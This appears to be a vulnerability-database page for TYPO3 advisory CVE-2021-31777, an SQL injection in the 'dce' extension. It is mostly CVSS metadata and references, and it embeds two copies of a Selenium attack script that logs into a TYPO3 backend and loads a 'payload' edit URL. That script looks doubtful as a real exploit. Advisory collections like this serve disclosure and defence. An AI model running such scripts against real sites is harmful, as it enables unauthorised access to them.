Description
The extension fails to properly sanitize user input and is susceptible to SQL Injection. A TYPO3 backend user account is required to exploit the vulnerability.
Affected Software
CPE Name
Name
Version
dce
2.2.0
dce
2.6.1
dce
2.7.0
Related
{"id": "TYPO3-EXT-SA-2021-005", "type": "typo3", "bulletinFamily": "software", "title": "SQL Injection in extension \"Dynamic Content Element\" (dce)", "description": "The extension fails to properly sanitize user input and is susceptible to SQL Injection. A TYPO3 backend user account is required to exploit the vulnerability.\n", "published": "2021-04-27T00:00:00", "modified": "2021-04-27T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 1.2, "impactScore": 3.6}, "href": "https://typo3.org/security/advisory/typo3-ext-sa-2021-005", "reporter": "TYPO3 Association", "references": [], "cvelist": ["CVE-2021-31777"], "immutableFields": [], "lastseen": "2021-08-10T12:23:56", "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-31777"]}, {"type": "github", "idList": ["GHSA-5V5H-4W2G-GXXC"]}, {"type": "osv", "idList": ["OSV:GHSA-5V5H-4W2G-GXXC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162429"]}, {"type": "zdt", "idList": ["1337DAY-ID-36182"]}]}, "score": {"value": 2.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-31777"]}, {"type": "github", "idList": ["GHSA-5V5H-4W2G-GXXC"]}, {"type": "nessus", "idList": ["TYPO3_DETECT.NASL"]}, {"type": "osv", "idList": ["OSV:GHSA-5V5H-4W2G-GXXC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162429"]}, {"type": "zdt", "idList": ["1337DAY-ID-36182"]}]}, "exploitation": null, "vulnersScore": 2.8}, "affectedSoftware": [{"version": "2.2.0", "operator": "ge", "name": "dce"}, {"version": "2.6.1", "operator": "le", "name": "dce"}, {"version": "2.7.0", "operator": "eq", "name": "dce"}], "_state": {"dependencies": 1659966727, "score": 1659970229}, "_internal": {"score_hash": "e717a33ea7a6b79b45df194c11e2d983"}}
{"cve": [{"lastseen": "2022-03-23T18:08:09", "description": "The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 4.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-28T07:15:00", "type": "cve", "title": "CVE-2021-31777", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2021-08-27T13:59:00", "cpe": [], "id": "CVE-2021-31777", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31777", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": []}], "osv": [{"lastseen": "2022-05-12T01:16:15", "description": "The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 4.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T20:12:23", "type": "osv", "title": "SQL Injection in t3/dce", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2021-05-03T16:51:32", "id": "OSV:GHSA-5V5H-4W2G-GXXC", "href": "https://osv.dev/vulnerability/GHSA-5v5h-4w2g-gxxc", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2021-05-03T20:54:34", "description": "", "published": "2021-05-03T00:00:00", "type": "packetstorm", "title": "TYPO3 6.2.1 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-31777"], "modified": "2021-05-03T00:00:00", "id": "PACKETSTORM:162429", "href": "https://packetstormsecurity.com/files/162429/TYPO3-6.2.1-SQL-Injection.html", "sourceData": "`# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 05.02.2021 \n# Vendor: https://typo3.org/ \n# Link: https://get.typo3.org/version/6.2.1 \n# CVE: CVE-2021-31777 \n# Proof: https://streamable.com/8v7v4i \n \n[+] Exploit Source: \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# CVE-2021-31777 \n \nfrom selenium import webdriver \nimport time \nimport os, sys \n \n \n# Vendor: https://typo3.org/ \nwebsite_link=\"http://192.168.1.3/typo3_src-6.2.1/typo3/index.php\" \n \n# enter your login username \nusername=\"nu11secur1ty\" \n \n# enter your login password \npassword=\"password\" \n \n#enter the element for username input field \nelement_for_username=\"username\" \n \n#enter the element for password input field \nelement_for_password=\"p_field\" \n \n#enter the element for submit button \nelement_for_submit=\"commandLI\" \n \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \ntime.sleep(3) \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \nsignInButton = browser.find_element_by_name(element_for_submit) \nsignInButton.click() \n \n# Exploit vulnerability MySQL user table by using backend.php vulnerability \ntime.sleep(3) \n# Payload link \nbrowser.get((\" \nhttp://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php?edit[be_users][1]=edit&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#\")) \n \n \nprint(\"The payload is deployed it is time to destroy some user...\\n\") \nos.system('pause') \n \nbrowser.close() \n \nexcept Exception: \n#### This exception is if the user is not found in the database or \nsomething is wrong. \nprint(\"Sorry, but this user who you searching for is destroyed by using of \nMySQL vulnerability in backend.php...\") \n \n--------------------------------- \n \n# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on \nbackend.php \n# Date: 05.02.2021 \n# Exploit Authotr idea: @nu11secur1ty \n# Exploit Debugging: @nu11secur1ty \n# Vendor Homepage: https://typo3.org/ \n# Software Link: https://get.typo3.org/version/6.2.1 \n \n# Steps to Reproduce: \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777 \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/162429/typo3621-sql.txt"}], "zdt": [{"lastseen": "2021-11-04T04:24:32", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-05-04T00:00:00", "type": "zdt", "title": "TYPO3 6.2.1 SQL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2021-05-04T00:00:00", "id": "1337DAY-ID-36182", "href": "https://0day.today/exploit/description/36182", "sourceData": "# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php\r\n# Author: @nu11secur1ty\r\n# Testing and Debugging: @nu11secur1ty\r\n# Vendor: https://typo3.org/\r\n# Link: https://get.typo3.org/version/6.2.1\r\n# CVE: CVE-2021-31777\r\n# Proof: https://streamable.com/8v7v4i\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python3\r\n# Author: @nu11secur1ty\r\n# CVE-2021-31777\r\n\r\nfrom selenium import webdriver\r\nimport time\r\nimport os, sys\r\n\r\n\r\n# Vendor: https://typo3.org/\r\nwebsite_link=\"http://192.168.1.3/typo3_src-6.2.1/typo3/index.php\"\r\n\r\n# enter your login username\r\nusername=\"nu11secur1ty\"\r\n\r\n# enter your login password\r\npassword=\"password\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n\r\n#enter the element for password input field\r\nelement_for_password=\"p_field\"\r\n\r\n#enter the element for submit button\r\nelement_for_submit=\"commandLI\"\r\n\r\n\r\n#browser = webdriver.Safari() #for macOS users[for others use chrome vis\r\nchromedriver]\r\nbrowser = webdriver.Chrome() #uncomment this line,for chrome users\r\n#browser = webdriver.Firefox() #uncomment this line,for chrome users\r\n\r\ntime.sleep(3)\r\nbrowser.get((website_link))\r\n\r\ntry:\r\nusername_element = browser.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = browser.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\nsignInButton = browser.find_element_by_name(element_for_submit)\r\nsignInButton.click()\r\n\r\n# Exploit vulnerability MySQL user table by using backend.php vulnerability\r\ntime.sleep(3)\r\n# Payload link\r\nbrowser.get((\"\r\nhttp://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php?edit[be_users][1]=edit&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#\"))\r\n\r\n\r\nprint(\"The payload is deployed it is time to destroy some user...\\n\")\r\nos.system('pause')\r\n\r\nbrowser.close()\r\n\r\nexcept Exception:\r\n#### This exception is if the user is not found in the database or\r\nsomething is wrong.\r\nprint(\"Sorry, but this user who you searching for is destroyed by using of\r\nMySQL vulnerability in backend.php...\")\r\n\r\n---------------------------------\r\n\r\n# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on\r\nbackend.php\r\n# Date: 05.02.2021\r\n# Exploit Authotr idea: @nu11secur1ty\r\n# Exploit Debugging: @nu11secur1ty\r\n# Vendor Homepage: https://typo3.org/\r\n# Software Link: https://get.typo3.org/version/6.2.1\r\n\r\n# Steps to Reproduce:\r\nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777\n\n# 0day.today [2021-11-04] #", "sourceHref": "https://0day.today/exploit/36182", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "github": [{"lastseen": "2022-08-13T05:00:08", "description": "The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 4.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T20:12:23", "type": "github", "title": "SQL Injection in t3/dce", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2022-08-13T03:06:29", "id": "GHSA-5V5H-4W2G-GXXC", "href": "https://github.com/advisories/GHSA-5v5h-4w2g-gxxc", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}]}